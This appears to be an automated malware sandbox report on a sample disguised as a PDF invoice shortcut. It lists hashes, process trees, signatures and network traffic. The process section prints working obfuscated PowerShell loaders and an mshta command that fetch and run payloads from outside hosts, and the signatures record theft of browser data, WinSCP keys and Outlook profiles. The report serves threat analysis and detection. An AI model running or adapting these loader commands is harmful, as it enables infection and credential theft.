| SHA512 | ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\vcruntime140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\msvcp140.dll
| MD5 | 7db24201efea565d930b7ec3306f4308 |
| SHA1 | 880c8034b1655597d0eebe056719a6f79b60e03c |
| SHA256 | 72fe4598f0b75d31ce2dc621e8ef161338c6450bb017cd06895745690603729e |
| SHA512 | bac5729a3eb53e9bc7b680671d028cabef5ea102dfaa48a7c453b67f8ecb358db9f8fb16b3b1d9ea5a2dff34f459f6ac87f3a563c736d81d31048766198ff11e |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Core.dll
| MD5 | 8c735052a2d4e9b01b0e028f0c20f67c |
| SHA1 | b72bde11de3310a495dd16520362f4adbf21717a |
| SHA256 | d751ab0357f71586b1793ce4166295aba085334647d6e3ffcd49287a801273e7 |
| SHA512 | 0bbd920e1b48361c7f3e1540ddb12fa6c9146bfe36e13eba2b2e6ca8bf3ad961d88121c6f70eca6d9ea413900455e696f7233c5bb54415ca7d2c9c1c0d4c1fb3 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Network.dll
| MD5 | fe5ed4c5da03077f98c3efa91ecefd81 |
| SHA1 | e23e839ec0602662788f761ebe7dd4b39c018a7f |
| SHA256 | d992aaeb21cb567113126c2912cf75e892c8e3ead5d50147a11abe704b9e2e2b |
| SHA512 | 22514732a0edf8fc2b8770139599132429080b86d2844143d21bb834cbddaaa077d763969960e39e2050a69493c1aae191600e5df6107bde90fae589a054f071 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Gui.dll
| MD5 | 34893cb3d9a2250f0edecd68aedb72c7 |
| SHA1 | 37161412df2c1313a54749fe6f33e4dbf41d128a |
| SHA256 | ca8334b2e63bc01f0749afeb9e87943c29882131efe58608ea25732961b2df34 |
| SHA512 | 484e32832d69ec1799bd1bcc694418801c443c732ed59ecd76b3f67abf0b1c97d64ae123728dfa99013df846ba45be310502ef6f8da42155da2e89f2a1e8cb2c |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5PrintSupport.dll
| MD5 | d0634933db2745397a603d5976bee8e7 |
| SHA1 | ddec98433bcfec1d9e38557d803bc73e1ff883b6 |
| SHA256 | 7d91d3d341dbba568e2d19382e9d58a42a0d78064c3ad7adfe3c7bb14742c2b1 |
| SHA512 | 9271370cd22115f68bd62572640525e086a05d75f5bc768f06e20b90b48a182f29a658a07099c7bc1e99bf0ffcf1229709524e2af6745d6fed7b41c1addd09f1 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\StarBurn.dll
| MD5 | 41e19ba2364f2c834b2487e1d02bb99a |
| SHA1 | 6c61d603dddfe384a93ad33775b70681d0a396d9 |
| SHA256 | c040a25377028b0c28db81a012de786c803a0e9d6f87ce460335a621d31f5340 |
| SHA512 | 6ebf4a9e80f16c6a03ff357d2da9a34a4227bfd65eb66d1d335349a77ba066d069ba0d47d46229b3c77b59052c42d388678662f970b418d8cc3cfb1223427d8c |
memory/4580-90-0x00007FFE70580000-0x00007FFE70ACE000-memory.dmp
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\vechpt
| MD5 | dd899ca13e5bef55bcea07e167da891b |
| SHA1 | e883f0240f127520486f063b033fb34fa2dfe5c1 |
| SHA256 | a818d6fa8caddaa608345ea40b75073a7c98637161794918566e2ddeeede47e7 |
| SHA512 | e38437899fcc433ef89a04c6a68684ea5110181af48a4699836939cf167d0c1fe7932432518445e90acbcbc151ee324d77de064147d97fdedf6ecabaac788c06 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\dcfa
| MD5 | 456596683dad1217c76d8c0f47b5cfbc |
| SHA1 | 001ae3f937aa75ad2175289c6e8f09561a1cbb35 |
| SHA256 | a7e578d0f7a5d522e4b4e62864f77cbb1830dc7e7026c9ee0b5f6fa7156c727f |
| SHA512 | 537420007a4985f2deb4b2a48af1ba61cf8cc112359ec1cdbd02dfb8e958ab5ab4ec302cd0698a14d4560afe6c23627d1d4d080eac9daa7cb5edc7259cb73591 |
memory/4580-93-0x00007FFE70400000-0x00007FFE70572000-memory.dmp
memory/1344-131-0x00007FFE71240000-0x00007FFE7178E000-memory.dmp
memory/1344-134-0x00007FFE70400000-0x00007FFE70572000-memory.dmp
memory/1344-135-0x00007FFE70400000-0x00007FFE70572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\940862fc
| MD5 | c3cec1b04ec373823d4adb1029a0bd1e |
| SHA1 | cd34cffcfb3bff8253661b02927e09436cf7543c |
| SHA256 | 54335d5d5fb92c75c5bedd2ac9818c66e4dffd42d5cff31f536be56c155ce5f2 |
| SHA512 | 30def85163cd72a76d74818bbf151a2ca540d85349ccc474521405cd449bbe402f722a1cc97d4d3f497bac38e59d754ef4fba655d1b010edfde02736a29f2936 |
memory/632-138-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/632-141-0x0000000074B80000-0x0000000074CFB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
| MD5 | 967f4470627f823f4d7981e511c9824f |
| SHA1 | 416501b096df80ddc49f4144c3832cf2cadb9cb2 |
| SHA256 | b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91 |
| SHA512 | 8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c |
memory/3720-148-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-149-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-152-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-156-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-157-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-158-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-162-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win10v2004-20241007-en
Max time kernel
123s
Max time network
153s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1676 set thread context of 804 | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | C:\Windows\SysWOW64\cmd.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0094.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
"C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe"
C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe
"C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe" -burn.filehandle.attached=540 -burn.filehandle.self=548
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe
"C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe"
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.0.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sirnisirlo.online | udp |
| US | 172.67.214.86:443 | sirnisirlo.online | tcp |
| US | 8.8.8.8:53 | 86.214.67.172.in-addr.arpa | udp |
Files
memory/3724-2-0x00007FFC5D9F3000-0x00007FFC5D9F5000-memory.dmp
memory/3724-3-0x000001CA63260000-0x000001CA63282000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_okti2ygx.aj5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3724-13-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp
memory/3724-14-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp
memory/3724-18-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 66898dbf1d1f32af63256328731f2c9e |
| SHA1 | 21f5828b21fae6d81e57a11e113440c95e1752de |
| SHA256 | 258ea4ccbc181f6b86d3a819981d9cf526950f1aa7517b12cda14b856aad8c90 |
| SHA512 | 65ab1f1224ba418a733b6fe9aecead3c97cb92bf236ffddd77ab70361d81d3d02c24e45c7db1019724d52a0556e2248ed23f696cb49b970efce0bba1666b5e94 |
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
| MD5 | b6ab13b3b9903bf84327737ba227bab3 |
| SHA1 | 65dff8665b502ba33f3effb8430263e4f906c1c0 |
| SHA256 | baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6 |
| SHA512 | 6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7 |
C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe
| MD5 | eb26dfa5e4e3170d90b5629df0715aa9 |
| SHA1 | bbc10367aa29aa36a6e53c63b60a6936bc6f1720 |
| SHA256 | 70721a20760818839c7ef0ce2d684666bd07bbb79b87415944c6efbce58f7906 |
| SHA512 | 11e2683c8f47c62548050f863386e62908c5dd7e456ca13c22644ecb984533d3abdd72d1fd5a3ac53c1b2734e5999554d383f3f5c615d4c94c4c169664787bf9 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Helicoid.dll
| MD5 | a9c5977784daf8cebe8408a8b6db3fbe |
| SHA1 | 8ae8d67007cdca9acf96681ffa6200e5847972de |
| SHA256 | 63f5a34563b62de3dffa57401d7225f4687933cef250b78b995eee813c862fad |
| SHA512 | 886fbea2c959ce4245185d1dcec3efcfbb50a71840c964d4fd8e0a46f7fbf8afbf7445bc2d892789f25124b862912fb0c3556c5004a7e6ddb4ee13b87cf58a65 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe
| MD5 | b84dfabe933d1160f624693d94779ce5 |
| SHA1 | ac0133c09708fe4a3c626e3ba4cdf44d3a0e065f |
| SHA256 | 588cb61b36a001384a2833bd5df8d7982ca79d6ae17a3d83a94e01b1e79684bd |
| SHA512 | eeaeef8d6b5fa02dedf9818babaa4b5ffdb87300521883aa290289dcc720b3d543279085ed3fc649b74654143e678502e56eb3f92c4baf53c075977de33c1b0e |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\vcruntime140_1.dll
| MD5 | 75e78e4bf561031d39f86143753400ff |
| SHA1 | 324c2a99e39f8992459495182677e91656a05206 |
| SHA256 | 1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e |
| SHA512 | ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\vcruntime140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\msvcp140.dll
| MD5 | 7db24201efea565d930b7ec3306f4308 |
| SHA1 | 880c8034b1655597d0eebe056719a6f79b60e03c |
| SHA256 | 72fe4598f0b75d31ce2dc621e8ef161338c6450bb017cd06895745690603729e |
| SHA512 | bac5729a3eb53e9bc7b680671d028cabef5ea102dfaa48a7c453b67f8ecb358db9f8fb16b3b1d9ea5a2dff34f459f6ac87f3a563c736d81d31048766198ff11e |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5Core.dll
| MD5 | 8c735052a2d4e9b01b0e028f0c20f67c |
| SHA1 | b72bde11de3310a495dd16520362f4adbf21717a |
| SHA256 | d751ab0357f71586b1793ce4166295aba085334647d6e3ffcd49287a801273e7 |
| SHA512 | 0bbd920e1b48361c7f3e1540ddb12fa6c9146bfe36e13eba2b2e6ca8bf3ad961d88121c6f70eca6d9ea413900455e696f7233c5bb54415ca7d2c9c1c0d4c1fb3 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5Network.dll
| MD5 | fe5ed4c5da03077f98c3efa91ecefd81 |
| SHA1 | e23e839ec0602662788f761ebe7dd4b39c018a7f |
| SHA256 | d992aaeb21cb567113126c2912cf75e892c8e3ead5d50147a11abe704b9e2e2b |
| SHA512 | 22514732a0edf8fc2b8770139599132429080b86d2844143d21bb834cbddaaa077d763969960e39e2050a69493c1aae191600e5df6107bde90fae589a054f071 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5Gui.dll
| MD5 | 34893cb3d9a2250f0edecd68aedb72c7 |
| SHA1 | 37161412df2c1313a54749fe6f33e4dbf41d128a |
| SHA256 | ca8334b2e63bc01f0749afeb9e87943c29882131efe58608ea25732961b2df34 |
| SHA512 | 484e32832d69ec1799bd1bcc694418801c443c732ed59ecd76b3f67abf0b1c97d64ae123728dfa99013df846ba45be310502ef6f8da42155da2e89f2a1e8cb2c |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5Widgets.dll
| MD5 | c502bb8a4a7dc3724ab09292cd3c70d6 |
| SHA1 | ff44fddeec2d335ec0eaa861714b561f899675fd |
| SHA256 | 4266918226c680789d49cf2407a7fec012b0ed872adafb84c7719e645f9b2e6d |
| SHA512 | 73bef89503ce032fba278876b7dab9eac275632df7a72c77093d433c932272da997e8fbeb431a09d84baac7b2ab2e55222ff687893311949a5603e738bfa6617 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5PrintSupport.dll
| MD5 | d0634933db2745397a603d5976bee8e7 |
| SHA1 | ddec98433bcfec1d9e38557d803bc73e1ff883b6 |
| SHA256 | 7d91d3d341dbba568e2d19382e9d58a42a0d78064c3ad7adfe3c7bb14742c2b1 |
| SHA512 | 9271370cd22115f68bd62572640525e086a05d75f5bc768f06e20b90b48a182f29a658a07099c7bc1e99bf0ffcf1229709524e2af6745d6fed7b41c1addd09f1 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\StarBurn.dll
| MD5 | 41e19ba2364f2c834b2487e1d02bb99a |
| SHA1 | 6c61d603dddfe384a93ad33775b70681d0a396d9 |
| SHA256 | c040a25377028b0c28db81a012de786c803a0e9d6f87ce460335a621d31f5340 |
| SHA512 | 6ebf4a9e80f16c6a03ff357d2da9a34a4227bfd65eb66d1d335349a77ba066d069ba0d47d46229b3c77b59052c42d388678662f970b418d8cc3cfb1223427d8c |
memory/3736-89-0x00007FFC5C970000-0x00007FFC5CEBE000-memory.dmp
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\vechpt
| MD5 | dd899ca13e5bef55bcea07e167da891b |
| SHA1 | e883f0240f127520486f063b033fb34fa2dfe5c1 |
| SHA256 | a818d6fa8caddaa608345ea40b75073a7c98637161794918566e2ddeeede47e7 |
| SHA512 | e38437899fcc433ef89a04c6a68684ea5110181af48a4699836939cf167d0c1fe7932432518445e90acbcbc151ee324d77de064147d97fdedf6ecabaac788c06 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\dcfa
| MD5 | 456596683dad1217c76d8c0f47b5cfbc |
| SHA1 | 001ae3f937aa75ad2175289c6e8f09561a1cbb35 |
| SHA256 | a7e578d0f7a5d522e4b4e62864f77cbb1830dc7e7026c9ee0b5f6fa7156c727f |
| SHA512 | 537420007a4985f2deb4b2a48af1ba61cf8cc112359ec1cdbd02dfb8e958ab5ab4ec302cd0698a14d4560afe6c23627d1d4d080eac9daa7cb5edc7259cb73591 |
memory/3736-92-0x00007FFC5D0D0000-0x00007FFC5D242000-memory.dmp
memory/1676-128-0x00007FFC5C970000-0x00007FFC5CEBE000-memory.dmp
memory/1676-132-0x00007FFC5D0D0000-0x00007FFC5D242000-memory.dmp
memory/1676-133-0x00007FFC5D0D0000-0x00007FFC5D242000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\78be679f
| MD5 | 2e7e4ea8ff444581c44338bfaa078491 |
| SHA1 | 0f16db2b5e3d420297da074ac82116b44fda05e3 |
| SHA256 | 7165887290c68c5933254756130722622bc2e7c496a7a1b1d3ca8b43bbec946d |
| SHA512 | b5e9621dd0cf474c650afcdccf9b7b5bffb7e850d4eab2871febe2a0a9a547af9f31be6386fb43f96b3248cce5273dc8d10e96a3365aae2a2d04f1836d703124 |
memory/804-136-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp
memory/804-139-0x00000000752E0000-0x000000007545B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
| MD5 | 967f4470627f823f4d7981e511c9824f |
| SHA1 | 416501b096df80ddc49f4144c3832cf2cadb9cb2 |
| SHA256 | b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91 |
| SHA512 | 8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c |
memory/836-146-0x00007FF770C80000-0x00007FF770F66000-memory.dmp
memory/836-147-0x00007FF770C80000-0x00007FF770F66000-memory.dmp
memory/836-149-0x00007FF770C80000-0x00007FF770F66000-memory.dmp
memory/836-154-0x00007FF770C80000-0x00007FF770F66000-memory.dmp
memory/836-155-0x00007FF770C80000-0x00007FF770F66000-memory.dmp
memory/836-159-0x00007FF770C80000-0x00007FF770F66000-memory.dmp
memory/836-160-0x00007FF770C80000-0x00007FF770F66000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win7-20240729-en
Max time kernel
35s
Max time network
130s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
